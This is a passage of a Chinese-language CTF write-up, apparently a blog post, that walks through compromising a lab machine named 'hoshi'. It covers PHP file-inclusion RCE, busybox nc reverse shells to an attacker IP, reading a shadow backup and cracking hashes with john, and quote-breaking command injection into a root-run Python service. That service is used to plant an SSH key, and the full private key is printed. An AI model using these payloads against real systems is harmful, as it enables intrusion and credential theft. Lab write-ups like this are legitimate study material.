. $count . ' \u6761\u53cd\u9988<\/li>';\n }\n }\n echo '<\/ul>';\n ?>\n <\/div>\n <?php } ?>\n <\/div>\n\n <footer class="text-center text-gray-400 text-sm mt-12 py-6">\n <p>\u00a9 2025 \u661f\u9645\u5546\u57ce | \u7ba1\u7406\u5458\u4e13\u7528<\/p>\n <\/footer>\n<\/body>\n<\/html>\n<?php\n\/\/ \u5220\u9664\u6587\u4ef6\u5904\u7406\uff08\u5fc5\u987b\u5728\u4efb\u4f55\u8f93\u51fa\u524d\uff09\nif (isset($_SESSION['logged_in']) && $_SESSION['logged_in'] === true && isset($_POST['delete_file'])) {\n $upload_dir = __DIR__ . '\/uploads\/';\n $metadata_file = $upload_dir . 'feedbacks.json';\n $del_file = basename($_POST['delete_file']);\n $del_path = $upload_dir . $del_file;\n if (is_file($del_path) && strpos($del_file, '.txt') !== false) {\n @unlink($del_path);\n \/\/ \u540c\u6b65\u5220\u9664 feedbacks.json \u4e2d\u7684\u8bb0\u5f55\n if (file_exists($metadata_file)) {\n $feedbacks = json_decode(file_get_contents($metadata_file), true);\n if (is_array($feedbacks)) {\n $feedbacks = array_filter($feedbacks, function($fb) use ($del_file) {\n return $fb['filename'] !== $del_file;\n });\n file_put_contents($metadata_file, json_encode(array_values($feedbacks), JSON_PRETTY_PRINT));\n }\n }\n \/\/ \u5220\u9664\u540e\u5237\u65b0\u9875\u9762\uff0c\u9632\u6b62\u91cd\u590d\u63d0\u4ea4\n header('Location: ' . $_SERVER['REQUEST_URI']);\n exit;\n }\n}\n\n\/\/ \u9875\u9762\u4e3b\u5185\u5bb9\u8f93\u51fa\u5b8c\u6bd5\u540e\u518d\u751f\u6210\u9759\u6001\u9875\u9762\nif (isset($_SESSION['logged_in']) && $_SESSION['logged_in'] === true) {\n $page_content = ob_get_contents();\n file_put_contents(__DIR__ . '\/admin.html', $page_content);\n echo '<div style="display:none" id="static-tip">[debug] \u9759\u6001\u9875\u9762\u5df2\u751f\u6210<\/div>';\n}\nob_end_flush();\n?><\/code><\/pre>\n\u8fd9\u91cc\u5141\u8bb8php<\/code>\u4ee3\u7801\u6267\u884c\uff0c\u4f1a\u8f6c\u4e49\u76f8\u5173\u4ee3\u7801\u751f\u6210\u9759\u6001\u754c\u9762\uff0c\u4f46\u662f\u4e0d\u4f1a\u8f6c\u4e49\u6587\u4ef6\u540d\uff0c\u8fd9\u4e2a\u5012\u662f\u8bd5\u51fa\u6765\u4e86\u3002<\/p>\n<\/div><\/p>\n\u5c1d\u8bd5\u4f7f\u7528\u6587\u4ef6\u5305\u542b\u5f39\u56deshell\uff01<\/p>\n
\u5c1d\u8bd5\u4f7f\u7528\u5bc6\u7801\u767b\u5f55admin.php<\/code>\uff0c\u7136\u540e\u5c1d\u8bd5\u6587\u4ef6\u5305\u542b\uff0c\u4f46\u662f\u5931\u8d25\u4e86\uff0c\u8fd9\u662f\u56e0\u4e3a\u53cd\u9988\u4fe1\u606f\u53cd\u9988\u5230\u7684\u662fadmin.html<\/code>\uff0c\u5728\u6e90\u4ee3\u7801\u53ef\u4ee5\u770b\u51fa\u6765\uff0c\u4f46\u662f\u6211\u4eec\u505a\u7684\u65f6\u5019\u4e0d\u77e5\u9053\uff0c\u8fd9\u91cc\u5fc5\u987b\u8fdb\u884c\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ dirsearch -u http:\/\/$IP\/ 2>\/dev\/null\n\n _|. _ _ _ _ _ _|_ v0.4.3\n (_||| _) (\/_(_|| (_| )\n\nExtensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460\n\nOutput File: \/home\/kali\/temp\/hoshi\/reports\/http_192.168.10.106\/__25-06-25_20-59-25.txt\n\nTarget: http:\/\/192.168.10.106\/\n\n[20:59:25] Starting: \n[20:59:27] 403 - 279B - \/.ht_wsr.txt\n[20:59:27] 403 - 279B - \/.htaccess.bak1\n[20:59:27] 403 - 279B - \/.htaccess.orig\n[20:59:27] 403 - 279B - \/.htaccess.sample\n[20:59:27] 403 - 279B - \/.htaccess.save\n[20:59:27] 403 - 279B - \/.htaccess_orig\n[20:59:27] 403 - 279B - \/.htaccess_extra\n[20:59:27] 403 - 279B - \/.htaccess_sc\n[20:59:27] 403 - 279B - \/.htaccessBAK\n[20:59:27] 403 - 279B - \/.htaccessOLD2\n[20:59:27] 403 - 279B - \/.htaccessOLD\n[20:59:27] 403 - 279B - \/.htm\n[20:59:27] 403 - 279B - \/.html\n[20:59:27] 403 - 279B - \/.htpasswd_test\n[20:59:27] 403 - 279B - \/.htpasswds\n[20:59:27] 403 - 279B - \/.httr-oauth\n[20:59:28] 403 - 279B - \/.php\n[20:59:33] 200 - 1KB - \/admin.php\n[20:59:33] 200 - 2KB - \/admin.html\n[20:59:53] 200 - 23KB - \/info.php\n[21:00:06] 200 - 109B - \/robots.txt\n[21:00:07] 403 - 279B - \/server-status\/\n[21:00:07] 403 - 279B - \/server-status\n[21:00:13] 301 - 318B - \/uploads -> http:\/\/192.168.10.106\/uploads\/\n[21:00:13] 200 - 681B - \/uploads\/\n\nTask Completed<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884cRCE\uff0c\u6210\u529f\u3002\u3002\u3002\u3002<\/p>\n
http:\/\/192.168.10.106\/hoshi\/gift.php?file=admin.html&0=whoami<\/code><\/pre>\n<\/div><\/p>\nhttp:\/\/192.168.10.106\/hoshi\/gift.php?file=admin.html&0=busybox%20nc%20192.168.10.107%201234%20-e%20bash\nhttp:\/\/192.168.10.106\/hoshi\/gift.php?file=admin.html&0=busybox nc 192.168.10.107 1234 -e bash<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h1>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n
\u4e0a\u4f20linpeas.sh<\/code>\u8fdb\u884c\u4fe1\u606f\u641c\u96c6\uff0c\u53ef\u4ee5\u7ffb\u5230\uff1a<\/p>\n(remote) www-data@hoshi:\/var\/backups$ ls -la\ntotal 52\ndrwxr-xr-x 2 root root 4096 Jun 20 13:03 .\ndrwxr-xr-x 12 root root 4096 Apr 1 10:05 ..\n-rw-r--r-- 1 root root 23836 Apr 11 22:03 apt.extended_states.0\n-rw-r--r-- 1 root root 2556 Apr 4 22:55 apt.extended_states.1.gz\n-rw-r--r-- 1 root root 2006 Apr 1 10:05 apt.extended_states.2.gz\n-rw-r--r-- 1 root root 1542 Apr 1 03:53 apt.extended_states.3.gz\n-rw-r--r-- 1 root root 757 Mar 30 21:29 apt.extended_states.4.gz\n-rw-r--r-- 1 root root 943 Mar 30 21:29 shadow~\n(remote) www-data@hoshi:\/var\/backups$ cat shadow~ \nroot:$6$TfSlMzl8\/eUh9mY0$wVygBx94VuTMRZq016O3IPG2mn1e.MFz2WKK.pACuy\/Sa1dTHqu0vWtbTBrt\/Q8dIWGBeYrY90ERemhYElKHv1:20190:0:99999:7:::\ndaemon:*:20166:0:99999:7:::\nbin:*:20166:0:99999:7:::\nsys:*:20166:0:99999:7:::\nsync:*:20166:0:99999:7:::\ngames:*:20166:0:99999:7:::\nman:*:20166:0:99999:7:::\nlp:*:20166:0:99999:7:::\nmail:*:20166:0:99999:7:::\nnews:*:20166:0:99999:7:::\nuucp:*:20166:0:99999:7:::\nproxy:*:20166:0:99999:7:::\nwww-data:*:20166:0:99999:7:::\nbackup:*:20166:0:99999:7:::\nlist:*:20166:0:99999:7:::\nirc:*:20166:0:99999:7:::\ngnats:*:20166:0:99999:7:::\nnobody:*:20166:0:99999:7:::\n_apt:*:20166:0:99999:7:::\nsystemd-timesync:*:20166:0:99999:7:::\nsystemd-network:*:20166:0:99999:7:::\nsystemd-resolve:*:20166:0:99999:7:::\nsystemd-coredump:!!:20166::::::\nmessagebus:*:20166:0:99999:7:::\nsshd:*:20166:0:99999:7:::\nwelcome:$6$geD2QaGnx\/AiHPAb$8ihVmhNA1GIUFbAkCuUp.KzsUuzAztIlrYNbPFoyORE9U9dsf\/L13AuCNpqkJSxu0HG4ltlhJFJKU2Y1Gj8Sg.:20259:0:99999:7:::<\/code><\/pre>\n\u5c1d\u8bd5\u7206\u7834\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ john -w=\/usr\/share\/wordlists\/rockyou.txt hash\nWarning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"\nUse the "--format=HMAC-SHA256" option to force loading these as that type instead\nUsing default input encoding: UTF-8\nLoaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 128\/128 SSE2 2x])\nCost 1 (iteration count) is 5000 for all loaded hashes\nWill run 4 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\nloveme2 (welcome) \n1g 0:00:00:12 0.16% (ETA: 23:21:28) 0.07955g\/s 2158p\/s 2260c\/s 2260C\/s 071184..gazza\nUse the "--show" option to display all of the cracked passwords reliably\nSession aborted\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ cat hash \nroot:$6$TfSlMzl8\/eUh9mY0$wVygBx94VuTMRZq016O3IPG2mn1e.MFz2WKK.pACuy\/Sa1dTHqu0vWtbTBrt\/Q8dIWGBeYrY90ERemhYElKHv1:20190:0:99999:7:::\nwelcome:$6$geD2QaGnx\/AiHPAb$8ihVmhNA1GIUFbAkCuUp.KzsUuzAztIlrYNbPFoyORE9U9dsf\/L13AuCNpqkJSxu0HG4ltlhJFJKU2Y1Gj8Sg.:20259:0:99999:7:::<\/code><\/pre>\n\u5207\u6362\u7528\u6237\uff0c\u6210\u529f\uff1a<\/p>\n
<\/div><\/p>\n\u63d0\u6743root<\/h2>\nwelcome@hoshi:~$ ls -la\ntotal 24\ndrwx------ 2 welcome welcome 4096 Jun 20 13:01 .\ndrwxr-xr-x 3 root root 4096 Apr 11 22:27 ..\nlrwxrwxrwx 1 root root 9 Jun 20 10:13 .bash_history -> \/dev\/null\n-rw-r--r-- 1 welcome welcome 220 Apr 11 22:27 .bash_logout\n-rw-r--r-- 1 welcome welcome 3526 Apr 11 22:27 .bashrc\n-rw-r--r-- 1 welcome welcome 807 Apr 11 22:27 .profile\n-rw-r--r-- 1 root root 44 Jun 20 10:13 user.txt\nwelcome@hoshi:~$ cat user.txt \nflag{user-73b671a5f913d849d405784a428288dd}\nwelcome@hoshi:~$ sudo -l\nMatching Defaults entries for welcome on hoshi:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser welcome may run the following commands on hoshi:\n (ALL) NOPASSWD: \/usr\/bin\/python3 \/root\/12345.py\nwelcome@hoshi:~$ sudo \/usr\/bin\/python3 \/root\/12345.py\nServer listening on port 12345...<\/code><\/pre>\n\u53d1\u73b0\u5f00\u653e\u4e86\u65b0\u7aef\u53e3\uff0c\u5c1d\u8bd5\u8fdb\u884c\u6d4b\u8bd5\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ nc $IP 12345 \nconf> help\n=== Configuration Shell ===\n?\/help List available commands\nq\/quit Exit the shell\nread_config Read server configuration\nwrite_config Write to server configuration\nlist_files List files in \/opt directory\ncheck_status Check server status\nexec_cmd Execute allowed system commands (e.g., whoami, pwd)\n\nconf> exec_cmd whoami\nroot\n\nconf> list_files\nFiles in \/opt:\nserver.conf\nserver.log\n\nconf> exec_cmd cat \/root\/.ssh\/id_rsa\nError: 'cat \/root\/.ssh\/id_rsa' not in allowed commands: whoami, pwd, date, id<\/code><\/pre>\n\u770b\u4e00\u4e0b\u76f8\u5173\u65e5\u5fd7\u6587\u4ef6\uff1a<\/p>\n
welcome@hoshi:~$ cd \/opt\nwelcome@hoshi:\/opt$ ls -la\ntotal 12\ndrwxr-xr-x 2 root root 4096 Jun 20 13:30 .\ndrwxr-xr-x 18 root root 4096 Mar 18 20:37 ..\n-rw-r--r-- 1 root root 0 Jun 20 13:30 server.conf\n-rw-r--r-- 1 root root 490 Jun 25 21:18 server.log\nwelcome@hoshi:\/opt$ cat server.conf \nwelcome@hoshi:\/opt$ cat server.log\n[2025-06-25 21:17:19] ('192.168.10.107', 37166): Received: help\n[2025-06-25 21:17:34] ('192.168.10.107', 37166): Received: exec_cmd whoami\n[2025-06-25 21:17:34] ('192.168.10.107', 37166): Executing command: sh -c 'whoami'\n[2025-06-25 21:17:48] ('192.168.10.107', 37166): Received: exec_cmd cat \/root\/.ssh\/id_rsa\n[2025-06-25 21:17:48] ('192.168.10.107', 37166): Invalid command: cat \/root\/.ssh\/id_rsa\n[2025-06-25 21:18:27] ('192.168.10.107', 37166): Received: whoami | cat \/root\/.ssh\/id_rsa<\/code><\/pre>\n\u53d1\u73b0\u5b58\u5728\u76f8\u5173\u5f15\u53f7\uff0c\u5c1d\u8bd5\u8fdb\u884c\u624b\u52a8\u95ed\u5408\uff0c\u518d\u5c1d\u8bd5\u5e38\u7528\u7684\u529e\u6cd5\uff1a<\/p>\n
conf> exec_cmd whoami' | 'id\nError: Forbidden characters (;|&<>) detected.<\/code><\/pre>\n\u53d1\u73b0\u8fc7\u6ee4\u4e86\u5e38\u7528\u7684\u529e\u6cd5\uff0c\u8fd9\u91cc\u5b9e\u9645\u4e0a\u53c8\u662f\u4e00\u4e2a\u969c\u773c\u6cd5\u3002\u3002\u3002\u3002\u3002\u8bf7\u770b\u6e90\u4ee3\u7801\uff1a<\/p>\n
import socket\nimport subprocess\nimport os\nimport re\nimport time \n\nCONFIG_FILE = "\/opt\/server.conf"\nLOG_FILE = "\/opt\/server.log" \n\ndef init_files():\n if not os.path.exists(CONFIG_FILE):\n with open(CONFIG_FILE, "w") as f:\n f.write("server_name: ctf_target\\nlog_file: \/opt\/server.log\\n")\n if not os.path.exists(LOG_FILE):\n with open(LOG_FILE, "w") as f:\n f.write("Server log initialized.\\n") \n\ndef log_action(action, client_addr):\n with open(LOG_FILE, "a") as f:\n timestamp = time.strftime("%Y-%m-%d %H:%M:%S")\n f.write(f"[{timestamp}] {client_addr}: {action}\\n") \n\ndef read_config():\n try:\n with open(CONFIG_FILE, "r") as f:\n return f.read().strip()\n except FileNotFoundError:\n return "Error: Config file not found."\n except Exception as e:\n return f"Error reading config: {str(e)}" \n\ndef write_config(data):\n try:\n\n if not re.match(r'^[a-zA-Z0-9\\s:._-]+$', data):\n return "Error: Invalid characters in input."\n with open(CONFIG_FILE, "a") as f:\n f.write(f"{data}\\n")\n return f"Written to config: {data}"\n except Exception as e:\n return f"Error writing config: {str(e)}" \n\ndef list_files():\n try:\n files = os.listdir("\/opt")\n return "Files in \/opt:\\n" + "\\n".join(files)\n except Exception as e:\n return f"Error listing files: {str(e)}" \n\ndef check_status():\n return """Service Status:\n- Running: Yes\n- Security: Advanced input validation enabled\n- Log: Active\n- Note: Command execution restricted to safe commands""" \n\ndef exec_cmd(cmd, client_addr):\n\n if re.search(r'[;|<>]', cmd):\n log_action(f"Blocked suspicious input: {cmd}", client_addr)\n return "Error: Forbidden characters (;|&<>) detected." \n\n allowed_cmds = ["whoami", "pwd", "date", "id"]\n base_cmd = cmd.split("'")[0].strip() \n if base_cmd not in allowed_cmds:\n log_action(f"Invalid command: {cmd}", client_addr)\n return f"Error: '{base_cmd}' not in allowed commands: {', '.join(allowed_cmds)}" \n try:\n\n full_cmd = f"sh -c '{cmd}'"\n log_action(f"Executing command: {full_cmd}", client_addr)\n result = subprocess.run(full_cmd, shell=True, capture_output=True, text=True, timeout=5)\n return result.stdout or result.stderr or "Command executed."\n except subprocess.TimeoutExpired:\n return "Error: Command timed out."\n except Exception as e:\n return f"Error executing command: {str(e)}" \n\ndef show_help():\n return """=== Configuration Shell ===\n?\/help List available commands\nq\/quit Exit the shell\nread_config Read server configuration\nwrite_config Write to server configuration\nlist_files List files in \/opt directory\ncheck_status Check server status\nexec_cmd Execute allowed system commands (e.g., whoami, pwd)\n""" \n\ndef handle_client(client_socket, client_addr):\n client_socket.send(b"conf> ")\n while True:\n try:\n data = client_socket.recv(1024).decode().strip()\n if not data:\n break \n log_action(f"Received: {data}", client_addr)\n parts = data.split(maxsplit=1)\n command = parts[0].lower() if parts else ""\n args = parts[1] if len(parts) > 1 else "" \n\n if command in ("?", "help"):\n response = show_help()\n elif command in ("q", "quit"):\n client_socket.send(b"Goodbye.\\n")\n break\n elif command == "read_config":\n response = f"Running 'cat {CONFIG_FILE}'\\n{read_config()}"\n elif command == "write_config":\n response = write_config(args) if args else "Error: write_config requires an argument."\n elif command == "list_files":\n response = list_files()\n elif command == "check_status":\n response = check_status()\n elif command == "exec_cmd":\n response = exec_cmd(args, client_addr) if args else "Error: exec_cmd requires an argument."\n else:\n response = "Unknown command. Type 'help' for commands." \n client_socket.send(f"{response}\\nconf> ".encode())\n except Exception as e:\n client_socket.send(f"Error: {str(e)}\\nconf> ".encode()) \n\ndef main():\n init_files()\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n server.bind(("0.0.0.0", 12345))\n server.listen(5)\n print("Server listening on port 12345...") \n while True:\n try:\n client_socket, addr = server.accept()\n print(f"Connection from {addr}")\n handle_client(client_socket, addr)\n client_socket.close()\n print(f"Connection from {addr} closed")\n except KeyboardInterrupt:\n print("\\nShutting down server...")\n break\n except Exception as e:\n print(f"Server error: {str(e)}") \n server.close() \nif __name__ == "__main__":\n main()<\/code><\/pre>\n\u6ca1\u6709\u771f\u7684\u7981\u7528\u6389&<\/code>\u3002\u3002\u3002\u3002\u3002<\/p>\nconf> exec_cmd whoami' && ls -la && '\nroot\ntotal 12\ndrwxr-xr-x 2 root root 4096 Jun 20 13:30 .\ndrwxr-xr-x 18 root root 4096 Mar 18 20:37 ..\n-rw-r--r-- 1 root root 0 Jun 20 13:30 server.conf\n-rw-r--r-- 1 root root 2669 Jun 25 21:38 server.log<\/code><\/pre>\n\u6ca1\u62a5\u9519\u5c31\u662f\u597d\u4e8b\u3002\u3002<\/p>\n
conf> exec_cmd whoami' && ls -la \/root && '\nroot\ntotal 52\ndrwx------ 6 root root 4096 Jun 21 05:10 .\ndrwxr-xr-x 18 root root 4096 Mar 18 20:37 ..\n-rwxr-xr-x 1 root root 5307 Jun 20 10:09 12345.py\nlrwxrwxrwx 1 root root 9 Mar 18 21:18 .bash_history -> \/dev\/null\n-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc\ndrwxr-xr-x 4 root root 4096 Apr 4 22:04 .cache\n-rw-r--r-- 1 root root 272 Jun 21 05:08 congrats.txt\ndrwx------ 3 root root 4096 Apr 4 21:00 .gnupg\ndrwxr-xr-x 3 root root 4096 Mar 18 21:04 .local\n-rw-r--r-- 1 root root 148 Aug 17 2015 .profile\n-rw-r--r-- 1 root root 44 Jun 20 10:12 root.txt\ndrw------- 2 root root 4096 Apr 4 23:57 .ssh\n-rw------- 1 root root 0 Jun 21 05:10 .viminfo\n-rw------- 1 root root 51 Jun 21 00:26 .Xauthority\n\nconf> exec_cmd whoami' && ls -la \/root\/.ssh && '\nroot\ntotal 8\ndrw------- 2 root root 4096 Apr 4 23:57 .\ndrwx------ 6 root root 4096 Jun 21 05:10 ..\n\nconf> exec_cmd whoami' && \/usr\/bin\/busybox nc -e \/bin\/bash 192.168.10.107 2345 && \u2018\n\/bin\/sh: 1: Syntax error: Unterminated quoted string\n\nconf> exec_cmd id' && pwd && '\nuid=0(root) gid=0(root) groups=0(root)\n\/opt\n\nconf> exec_cmd id' && ssh-keygen -t rsa -b 4096 -f \/root\/.ssh\/id_rsa -N "" -q && '\nuid=0(root) gid=0(root) groups=0(root)\n\nconf> exec_cmd id' && ls -la \/root\/.ssh && '\nuid=0(root) gid=0(root) groups=0(root)\ntotal 16\ndrw------- 2 root root 4096 Jun 25 21:52 .\ndrwx------ 6 root root 4096 Jun 21 05:10 ..\n-rw------- 1 root root 3369 Jun 25 21:52 id_rsa\n-rw-r--r-- 1 root root 736 Jun 25 21:52 id_rsa.pub\n\nconf> exec_cmd id' && mv \/root\/.ssh\/id_rsa.pub \/root\/.ssh\/authorized_keys && '\nuid=0(root) gid=0(root) groups=0(root)\n\nconf> exec_cmd id' && ls -la \/root\/.ssh && '\nuid=0(root) gid=0(root) groups=0(root)\ntotal 16\ndrw------- 2 root root 4096 Jun 25 21:53 .\ndrwx------ 6 root root 4096 Jun 21 05:10 ..\n-rw-r--r-- 1 root root 736 Jun 25 21:52 authorized_keys\n-rw------- 1 root root 3369 Jun 25 21:52 id_rsa\n\nconf> exec_cmd id' && cat \/root\/.ssh\/id_rsa && '\nuid=0(root) gid=0(root) groups=0(root)\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAACFwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAgEA73giWqEm20rtZndzEtt2txG\/QKUtorBUHYRej0Lt4zduE4w+jyte\ndeA8arshJBjDXQbhqc4EL17hF\/WdEUHY8CxTAqRgHTGQBXV2Y24F6xWxiR+1zSKEQmxWD6\n4dnZ3OH8AFUE31uviXYZPlSvm\/1WYTW1\/YmoxTIp9eV974v3r8SJJnm1xi0e8kDJuLRJf7\nfcTluOnq0f3XoGbXMHdjWNo73Z0a4k\/ZYydENh\/XErYVJIMQi36s04zVZw\/400RsC8PBIK\nfqIHvsxxGwQAyujb+yEjVZi5vH\/t+Kxt0BHOsSnIguU50pWIrsxWnc6BBYvI6bvddG\/TqN\nR9yn\/iEhuZwptvNXydYX3tlA8mHWSmDsilR0QslEq6yI3KSm80edyc7tOvKU5quofNEYoB\npKmU4exN+OWUQ+c79+r14\/RE10B9+kpHRhbi7R7+fZZ\/L+OzAiUoZmkOUVZQvE1viguky4\n8zCgQhuDQCZoODpyCmjc3WV\/OTAJrXq0yrZxH\/PelI8uo2zZM2MdEAsPVr8brms9PdUxf+\ntkZ0W2s06L4gr1ABXfpRhyfpAAGhSR+ywwq2xyvK\/grn\/OIdwOghsuqteULyDIfQW0DiPh\nV2FNkIf1xU9MH+wIAv2Lkogf8IZsKG2sCnTF5ZIrszGAfV+gM5PzQtamd6WOBbt3PAovev\n8AAAdALZwtfC2cLXwAAAAHc3NoLXJzYQAAAgEA73giWqEm20rtZndzEtt2txG\/QKUtorBU\nHYRej0Lt4zduE4w+jytedeA8arshJBjDXQbhqc4EL17hF\/WdEUHY8CxTAqRgHTGQBXV2Y2\n4F6xWxiR+1zSKEQmxWD64dnZ3OH8AFUE31uviXYZPlSvm\/1WYTW1\/YmoxTIp9eV974v3r8\nSJJnm1xi0e8kDJuLRJf7fcTluOnq0f3XoGbXMHdjWNo73Z0a4k\/ZYydENh\/XErYVJIMQi3\n6s04zVZw\/400RsC8PBIKfqIHvsxxGwQAyujb+yEjVZi5vH\/t+Kxt0BHOsSnIguU50pWIrs\nxWnc6BBYvI6bvddG\/TqNR9yn\/iEhuZwptvNXydYX3tlA8mHWSmDsilR0QslEq6yI3KSm80\nedyc7tOvKU5quofNEYoBpKmU4exN+OWUQ+c79+r14\/RE10B9+kpHRhbi7R7+fZZ\/L+OzAi\nUoZmkOUVZQvE1viguky48zCgQhuDQCZoODpyCmjc3WV\/OTAJrXq0yrZxH\/PelI8uo2zZM2\nMdEAsPVr8brms9PdUxf+tkZ0W2s06L4gr1ABXfpRhyfpAAGhSR+ywwq2xyvK\/grn\/OIdwO\nghsuqteULyDIfQW0DiPhV2FNkIf1xU9MH+wIAv2Lkogf8IZsKG2sCnTF5ZIrszGAfV+gM5\nPzQtamd6WOBbt3PAovev8AAAADAQABAAACAFWDdekdQQ3wPMRphWtHeaY4LS69jYVaKD9+\nJHJOOTr5cVKDs1dW6l13nLuUZWpJeYI\/0dfcXLw5ynHO4K7n77scaOw5nKTwLPj2EDfDc1\nOWpJZN\/5Lob4h0vWrOB39gedn2rS8XF9gTq6NJuAjFFM70q5bmrCfMUme7t2nzkqp2FZ8o\nwNzG6fcDycDCzsHI8CLibBJTXeptFlIOR2vkRlLVY6loz8\/fKcbxn7cgOaJR6UznjMHzk2\n3cDdzG5Fk1RswQtGef7sh42H3iAClvHeo6eTFtYbOsBogqdZk8FIiqHTROoRR0u+4FdjWs\n7xjjtXxoBI+PT6dgAFGYJ1llpW+8z61smli8dbGGTWmz+MSjTOPtVxaMuZh1fUjwv5PqrQ\nmZZDhssBG5LB4ELYRsZzgGimNyRLuhRJBVjZMfn2i8cx\/1iLXbEbTDc1crnq1iKDCvd4M7\n7Sqp5HbgdbDUFNR6Wff6msy4c3ZxbEyyiCGKOPf57pC\/GGOT\/AzQLIEJ3\/1+GLhbcNLLB9\nsZ7CmiE8cYbsC\/8ddkWyoHUWlwqC243XznHu4p59R+VtWgRDWTExwwRNGewR9uqrzTTCDB\nyOFl8hE8xi6WWLYGAxIqfMkwJacelCrfKNiSuwEsHluyh4wVWSlYw4WKdvQphVb+4yEMQ8\njOnOO5RR72OQMbn\/KBAAABAQCk5K5H0dSl34bG8nG9Y7XtkVNEgsPr+HEtqz9rMWFaEJM+\nt8GhTvBzNTpM6OUIptxuRDYL0ZQ4+Clqmh1s6iulBUnVN2bKL1tT3PdngFQ5E8obuTi4MT\nM8wCaf34Sfytk6c8wGq65+bCJIZF88g1r9tSYpJHAjLEwLBu+6BvTNUQdeCrZb48udaFxP\nme3YdF\/3b9lV1XvE21XXFYKYYcJCBgSsZ8SY0EcItPuTj11J76HWJaFAQwL1+6tp8z2PDc\nVcck2WGTVGDLCcKVE92Fa7oJ\/MXx3pTINqAB96xKhaKmAOluObD4XXAZfGKL4bRwRyebBg\nMf+yk\/EIr7XgQDpLAAABAQD5\/zZSXECB8b8rKJFLnce9GfV61Jbo+Mw60EPirMPmrFn7UW\nEDmIlV+pHTjpfnt\/ivFmT03hwzqv0xTlmwinCH5sX9WBZdwL5sopNxh6vJlnBguPV7Z\/0q\nBPPFXznUAJLKruN4MRHFOAOKEMfw18eswGucnUvQ5S5Ow86URYgL3l00GaQDAa024qIjfe\ni4WOt6ZaqaeFz0Gmr0ynh5AxER0I3D6dCDHlRkmE44T71T7k18qn4+JkN6UGbXrElw6Qwx\nxVPL94dctdvH194p9Ppm3SlaL3PM5gkR1GV31kD\/9DKxzSkqQPLZrQkRUalSr8T6yhru\/q\n+gRhdZuz1Qphc\/AAABAQD1ODTGvuYt2PvVcVKDHGx\/xgg9mpjVdFghd1TRES6ZaNdmrrkC\nQ\/RPFcS+xxMgUeMZR6UIGc9Ig8gBFGaODf8DoX1XBPISNpUTwRdzLnfn19b6VUh79GiTnh\nztTi4KXYf2y3ojMC2OTy\/TFPv6OMjXGjjDEXAVLFJRkFfUqmd55t35YrOmV51SH7y+IQ+I\n4kYxWYPGtgmH+x+yn387xbgerpKrncJfP2BvV7HhNHMUpQrt2125DUFbpJzK\/QxPMyGWLr\nB2yZgHiJFub1rxSKQqGbjYHwIhK6COP5Vio9hRMbGII3VhhmZPkJCAfkgpwCNYn7WfjOPh\nQuWVT5lhi2xBAAAACnJvb3RAaG9zaGk=\n-----END OPENSSH PRIVATE KEY-----\n\nconf> q\nGoodbye.<\/code><\/pre>\n<\/div><\/p>\nroot@hoshi:~# cat congrats.txt root.txt \nCongratulations, Hacker!\n\nYou've successfully pwned this target machine! \ud83c\udf89 \nYour skills are top-notch, and you've earned ultimate bragging rights.\n\nKeep hacking, keep learning, and check out more challenges at maze-sec.com!\nSee you in the next challenge!\n\n- Sublarge \n\nflag{root-5de923e57adefd6a1fd53a6705ad6486}<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"hoshi \u505a\u7684\u597d\u7528\u5fc3\u554a\uff01 \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi] \u2514 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-908","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/908","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=908"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/908\/revisions"}],"predecessor-version":[{"id":909,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/908\/revisions\/909"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=908"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=908"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=908"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
